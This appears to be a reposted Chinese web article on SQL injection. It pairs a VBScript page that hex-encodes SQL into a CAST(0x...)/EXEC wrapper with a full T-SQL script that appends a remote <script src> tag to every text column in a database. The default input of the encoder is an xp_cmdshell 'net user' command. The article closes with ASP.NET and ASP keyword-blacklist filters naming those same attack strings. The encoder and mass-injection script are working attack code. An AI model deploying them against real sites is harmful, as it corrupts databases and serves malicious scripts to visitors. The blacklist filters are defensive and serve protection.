SQL注入之SQL语句转十六进制
HTML代码
<script language=vbs>
' Reads the text box, hex-encodes it with Str2Hex and writes a
' DECLARE / CAST(0x... AS NVARCHAR) / EXEC wrapper around the literal into the page.
' Defender note: the wrapper itself still carries DECLARE, CAST( and EXEC, and
' both keyword lists further down this page include "declare", so this encoding
' does not get past them; what it hides is only the statement inside the literal.
sub sqlencode()
Dim strTest
strTest = form1.text1.value
myHex = Str2Hex(strTest)
document.write "<pre>DECLARE @S NVARCHAR(4000) SET @S=CAST(0x"&myhex&" AS NVARCHAR(4000)) EXEC(@S)</pre>"
end sub
' Encodes strHex character by character as Hex(Asc(ch)) followed by "00",
' i.e. the low byte then a zero high byte, which is the UTF-16LE layout the
' NVARCHAR cast in sqlencode decodes. No "0x" prefix is added; the caller supplies it.
Function Str2Hex(ByVal strHex)
Dim sHex
For i = 1 To Len(strHex)
sHex = sHex & Hex(Asc(Mid(strHex,i,1)))&"00"
Next
Str2Hex = sHex
End Function
</script>
<form name=form1 method="post">
<p>请输入sql语句,例子:</p><br>
<input type=text name=text1 value='exec master.dbo.xp_cmdshell "net user"--' size=100><input type=submit onclick=sqlencode()
value="给我转">
</form>
exp
原程序代码
-- Decoded form of the hex-wrapped payload shown below this listing. Defender notes:
-- * Enumerates every user table (sysobjects.xtype='u') joined to its columns of
--   type ntext (99), text (35), nvarchar (231) or varchar (167).
-- * For each table/column pair it runs dynamic SQL that appends a <script src=...>
--   tag to every row's value, i.e. a stored-XSS mass injection across all string columns.
-- * Detection: a cursor over sysobjects/syscolumns feeding EXEC, or the
--   CAST(0x... AS NVARCHAR) / EXEC(@S) wrapper, in request logs or SQL audit traces.
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name FROM sysobjects a,syscolumns b Where a.id=b.id AND a.xtype='u' AND (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT
FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('Update ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://****/*.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
转换后的代码
DECLARE @S NVARCHAR(4000) SET @S=CAST(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
其功能是遍历该数据库所有数据表中所有 varchar、text、nvarchar、ntext 类型的字段,并在字段值末尾追加
<script src=http://****/*.js></script>,常用于js或iframe挂马。
ASP.NET防SQL注入程序代码
using System;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.Configuration;
using System.Globalization;
using System.IO;
using System.Text;
using System.Web;
namespace Koray.SqlInject
{
/* public class SqlInject
{
}
*/
/// <summary>
/// HTTP module entry point: hooks BeginRequest so every request is screened by
/// <see cref="ProcessRequest"/> before the page handler runs.
/// </summary>
public class SqlstrAny : IHttpModule
{
    /// <summary>Subscribes the screening handler to the application's BeginRequest event.</summary>
    /// <param name="application">The application this module is attached to.</param>
    public void Init(HttpApplication application)
    {
        application.BeginRequest += Application_BeginRequest;
    }

    /// <summary>Runs the SQL-fragment screen for the current request.</summary>
    /// <param name="source">Event source (unused).</param>
    /// <param name="e">Event data (unused).</param>
    private void Application_BeginRequest(Object source, EventArgs e)
    {
        new ProcessRequest().StartProcessRequest();
    }

    /// <summary>Nothing to release; the module holds no resources.</summary>
    public void Dispose()
    {
    }
}
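/// <summary>
/// Screens the current request's query string, form fields and cookies for the
/// SQL fragments listed in the "SQLInject" application setting and redirects to
/// the "SQLInjectErrPage" page when one is found.
/// A keyword blacklist is defence in depth only: it cannot replace parameterised
/// queries, and it rejects legitimate input that happens to contain a listed word.
/// </summary>
public class ProcessRequest
{
    // AppSettings keys are case-insensitive, so "SqlInject" also resolves the
    // web.config entry "SQLInject". Missing keys fall back to harmless defaults;
    // calling .ToString() on a null entry here (as the original did) throws a
    // TypeInitializationException that disables the whole module. Both settings
    // are read through ConfigurationManager; ConfigurationSettings is obsolete.
    private static readonly string SqlStr = ConfigurationManager.AppSettings["SqlInject"] ?? "";
    private static readonly string sqlErrorPage = ConfigurationManager.AppSettings["SQLInjectErrPage"] ?? "/error.aspx";

    // Pattern list split once. Empty entries (e.g. a trailing '|') are dropped
    // because IndexOf("") is 0 for every string and would block every request.
    private static readonly string[] SqlPatterns = SplitPatterns(SqlStr);

    /// <summary>Splits a '|'-separated pattern list, discarding empty entries.</summary>
    /// <param name="patternList">Raw setting value; may be null or empty.</param>
    /// <returns>The non-empty patterns, unmodified otherwise (never null).</returns>
    private static string[] SplitPatterns(string patternList)
    {
        if (string.IsNullOrEmpty(patternList))
        {
            return new string[0];
        }
        List<string> patterns = new List<string>();
        foreach (string part in patternList.Split('|'))
        {
            if (!string.IsNullOrEmpty(part))
            {
                patterns.Add(part);
            }
        }
        return patterns.ToArray();
    }

    /// <summary>
    /// Tells whether the request body is a multipart upload. Uploads are skipped:
    /// the module only inspects name/value parameters, not file contents.
    /// </summary>
    /// <param name="request">Current request.</param>
    /// <returns>true when the content type starts with multipart/form-data.</returns>
    bool IsUploadRequest(HttpRequest request)
    {
        return StringStartsWithAnotherIgnoreCase(request.ContentType, "multipart/form-data");
    }

    /// <summary>Case-insensitive, culture-independent prefix test that tolerates null.</summary>
    /// <param name="s1">String to test; null never matches.</param>
    /// <param name="s2">Expected prefix; null never matches.</param>
    /// <returns>true when <paramref name="s1"/> starts with <paramref name="s2"/>.</returns>
    private static bool StringStartsWithAnotherIgnoreCase(string s1, string s2)
    {
        return s1 != null && s2 != null && s1.StartsWith(s2, StringComparison.OrdinalIgnoreCase);
    }

    //SQL注入式攻击代码分析
    #region SQL注入式攻击代码分析
    /// <summary>
    /// Entry point called on BeginRequest. Checks query string, form and cookies in
    /// that order; the first hit is logged and answered with a redirect to the error
    /// page. Multipart uploads are not inspected.
    /// </summary>
    public void StartProcessRequest()
    {
        HttpContext context = HttpContext.Current;
        if (context == null)
        {
            return;
        }
        HttpRequest request = context.Request;
        HttpResponse response = context.Response;
        try
        {
            if (IsUploadRequest(request))
            {
                return; // streamed body; nothing to screen here
            }

            string key;
            string value;
            if (FindSuspiciousEntry(request.QueryString, out key, out value))
            {
                Reject(context, "QueryStringError", key, value);
                return;
            }
            if (FindSuspiciousEntry(request.Form, out key, out value))
            {
                Reject(context, "FormError", key, value);
                return;
            }

            HttpCookieCollection cookies = request.Cookies;
            if (cookies != null)
            {
                for (int i = 0; i < cookies.Count; i++)
                {
                    HttpCookie cookie = cookies[i];
                    // Log cookie.Value: the original logged the HttpCookie object,
                    // which only prints its type name.
                    if (cookie != null && !ProcessSqlStr(cookie.Value))
                    {
                        Reject(context, "CookieError", cookie.Name, cookie.Value);
                        return;
                    }
                }
            }
        }
        catch (System.Threading.ThreadAbortException)
        {
            // Raised by Response.End: it is how ASP.NET stops the pipeline, not a failure.
            throw;
        }
        catch (Exception ex)
        {
            // Keep the exception text server-side; echoing ex.Message to the client
            // discloses paths and configuration details.
            logSqlstr("ProcessRequest failure: " + ex);
            response.Clear();
            response.Write("CustomErrorPage Error");
            response.End();
        }
    }

    /// <summary>Finds the first entry whose value fails <see cref="ProcessSqlStr"/>.</summary>
    /// <param name="values">Query string or form collection; null is treated as empty.</param>
    /// <param name="key">Name of the offending entry ("" for an unnamed query value), or null.</param>
    /// <param name="value">Its value, or null.</param>
    /// <returns>true when an offending entry was found.</returns>
    private bool FindSuspiciousEntry(NameValueCollection values, out string key, out string value)
    {
        key = null;
        value = null;
        if (values == null)
        {
            return false;
        }
        for (int i = 0; i < values.Count; i++)
        {
            // values[i] joins repeated names with ',', exactly like values[name] did.
            string candidate = values[i];
            if (!ProcessSqlStr(candidate))
            {
                key = values.GetKey(i) ?? "";
                value = candidate;
                return true;
            }
        }
        return false;
    }

    /// <summary>
    /// Logs the hit and redirects to the error page. endResponse=false plus
    /// CompleteRequest ends the pipeline without the ThreadAbortException that
    /// Response.Redirect(url) would otherwise throw through the caller's catch block.
    /// </summary>
    /// <param name="context">Current context.</param>
    /// <param name="errmsg">Error code placed in the redirect query string.</param>
    /// <param name="key">Name of the offending parameter.</param>
    /// <param name="value">Its value (logged, never echoed to the client).</param>
    private void Reject(HttpContext context, string errmsg, string key, string value)
    {
        DateTime now = DateTime.Now;
        logSqlstr(now.ToShortDateString() + " " + now.ToShortTimeString() + ":" + context.Request.ServerVariables["Url"]);
        logSqlstr(key + "=" + value);
        context.Response.Redirect(sqlErrorPage + "?errmsg=" + errmsg + "&sqlprocess=true", false);
        if (context.ApplicationInstance != null)
        {
            context.ApplicationInstance.CompleteRequest();
        }
        else
        {
            context.Response.End();
        }
    }

    /// <summary>Checks one submitted value against the configured pattern list.</summary>
    /// <param name="Str">Submitted value; null or empty is trivially clean.</param>
    /// <returns>true when no pattern occurs in the value (ordinal, case-insensitive).</returns>
    private bool ProcessSqlStr(string Str)
    {
        if (string.IsNullOrEmpty(Str))
        {
            return true;
        }
        foreach (string pattern in SqlPatterns)
        {
            // Ordinal ignore-case: the original lower-cased the input with the current
            // culture and could never match a pattern configured with upper-case letters.
            if (Str.IndexOf(pattern, StringComparison.OrdinalIgnoreCase) >= 0)
            {
                return false;
            }
        }
        return true;
    }

    /// <summary>
    /// Appends one line to /Log/log_&lt;date&gt;.log under the application root.
    /// Best effort: a logging failure must not suppress the redirect, so I/O errors
    /// are swallowed here instead of surfacing in StartProcessRequest's catch.
    /// CR/LF in the message are replaced so a request cannot forge extra log lines.
    /// </summary>
    /// <param name="str">Line to write; null is written as an empty line.</param>
    private void logSqlstr(string str)
    {
        HttpContext context = HttpContext.Current;
        if (context == null)
        {
            return;
        }
        string fileName = context.Request.MapPath("/Log/log_" + DateTime.Now.ToShortDateString().Replace("/", "_") + ".log");
        string line = (str ?? "").Replace("\r", " ").Replace("\n", " ");
        try
        {
            // Append mode creates the file when it is missing; the original's separate
            // File.Create/Close step was redundant, and `using` closes on every path.
            using (StreamWriter writer = new StreamWriter(fileName, true, Encoding.UTF8))
            {
                writer.WriteLine(line);
            }
        }
        catch (IOException)
        {
            // e.g. the /Log directory does not exist; deliberately ignored (see summary)
        }
        catch (UnauthorizedAccessException)
        {
            // deliberately ignored (see summary)
        }
    }
    #endregion
}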
}
在web.config中加入
<appSettings>
<add value="exec|insert|delete|update|chr|mid|master|truncate|declare|cast(|drop table" key="SQLInject" />
<add value="/error.aspx" key="SQLInjectErrPage" />
</appSettings>
<httpModules>
<add name="SqlstrAny" type="Koray.SqlInject.SqlstrAny,Koray.SqlInject"/>
</httpModules>
ASP.NET组件参考了:
http://hi.baidu.com/honfei/blog/item/7d6bd23610cd0edaa3cc2ba8.html
ASP防SQL注入代码
' Screens the requested URL plus query string for a fixed list of SQL/command
' fragments. On a hit the event is appended to the daily log and a warning page
' is returned instead of the requested resource.
' Only the query string is inspected; form fields and cookies are not.
' The list also matches ":" and "'" anywhere in the query string, so ordinary
' values containing those characters are rejected as well.
' NOTE(review): getIP() is defined elsewhere; if it reads a client-supplied header
' (e.g. X-Forwarded-For) the unencoded Response.Write below reflects it - confirm.
Sub SQLInject
    Dim strTemp, errLogFile, rtnerr, RtnArr, ErrLogFileName, patterns, p, hit
    ErrLogFileName = "/Log/err_" & DateToStr(Now(), "Y-m-d") & ".log"
    strTemp = "" & Request.ServerVariables("URL")
    If Trim(Request.QueryString) <> "" Then
        strTemp = strTemp & "?" & Trim(Request.QueryString)
    End If
    strTemp = LCase(strTemp)
    patterns = Array("declare", "select", "insert into", "delete from", "count(", "drop table", "truncate", "mid(", "char(", "xp_cmdshell", "exec master", "net localgroup administrators", ":", "net user", "'")
    hit = False
    For Each p In patterns
        If InStr(strTemp, p) > 0 Then
            hit = True
            Exit For
        End If
    Next
    If hit Then
        ' Previous log content is re-read and rewritten in full; a missing or
        ' unreadable file starts a new log with the marker "start".
        RtnArr = LoadFromFile(ErrLogFileName)
        If RtnArr(0) = 0 Then
            errLogFile = RtnArr(1)
        Else
            errLogFile = "start"
        End If
        errLogFile = errLogFile & vbCrLf & vbCrLf
        errLogFile = errLogFile & "IP:" & getIP() & " Time:" & CStr(Now()) & " Info:" & strTemp
        rtnerr = SaveToFileByGb2312(errLogFile, ErrLogFileName)
        Response.Write "<html><title>Waring</title><body bgcolor=""EEEEEE"" leftmargin=""60"" topmargin=""30""><font style=""font-size:16px;font-weight:bolder;color:blue;""><li>You has been submit a bad querystring!</li></font><font style=""font-size:14px;font-weight:bolder;color:red;""><br><li>Your Ip Has been record!</li><br><li>IP:"&getIP()&"</li><br><li>Time:"&Now&"</li></font></body></html><!--AddTime:"&now&"-->"
        Response.End
    End If
End Sub
'读日志文件
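' Reads the whole log file as text.
' Returns Array(0, contents) on success or Array(Err.Number, Err.Description)
' when the file cannot be loaded or read.
' The file is written by SaveToFileByGb2312 with charset gb2312, so it is read
' with the same charset; the original read it as utf-8, which mangled any
' non-ASCII bytes on every read/rewrite round trip.
' Error handling is switched back off after the checked calls, and the stream is
' closed on the failure path too.
Function LoadFromFile(ByVal File)
    Dim objStream, RText
    RText = Array(0, "")
    Set objStream = Server.CreateObject("ADODB.Stream")
    objStream.Type = 2       ' adTypeText
    objStream.Mode = 3       ' adModeReadWrite
    objStream.Open
    objStream.Charset = "gb2312"
    On Error Resume Next
    objStream.LoadFromFile Server.MapPath(File)
    If Err.Number = 0 Then
        RText = Array(0, objStream.ReadText)
    End If
    If Err.Number <> 0 Then
        RText = Array(Err.Number, Err.Description)
        Err.Clear
    End If
    On Error GoTo 0
    objStream.Close
    Set objStream = Nothing
    LoadFromFile = RText
End Function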
'写日志
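' Overwrites the log file with strBody encoded as gb2312.
' Returns Array(0, "保存文件成功!") on success or Array(Err.Number, Err.Description)
' when the save fails (e.g. the /Log directory is missing), mirroring LoadFromFile's
' return convention instead of raising an unhandled error into the request.
Function SaveToFileByGb2312(ByVal strBody, ByVal File)
    Dim objStream, RText
    RText = Array(0, "保存文件成功!")
    Set objStream = Server.CreateObject("ADODB.Stream")
    objStream.Type = 2       ' adTypeText
    objStream.Open
    objStream.Charset = "gb2312"
    objStream.WriteText strBody
    On Error Resume Next
    objStream.SaveToFile Server.MapPath(File), 2   ' adSaveCreateOverWrite
    If Err.Number <> 0 Then
        RText = Array(Err.Number, Err.Description)
        Err.Clear
    End If
    On Error GoTo 0
    objStream.Close
    Set objStream = Nothing
    SaveToFileByGb2312 = RText
End Function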
原文地址:http://www.nbman.cn/article.asp?id=112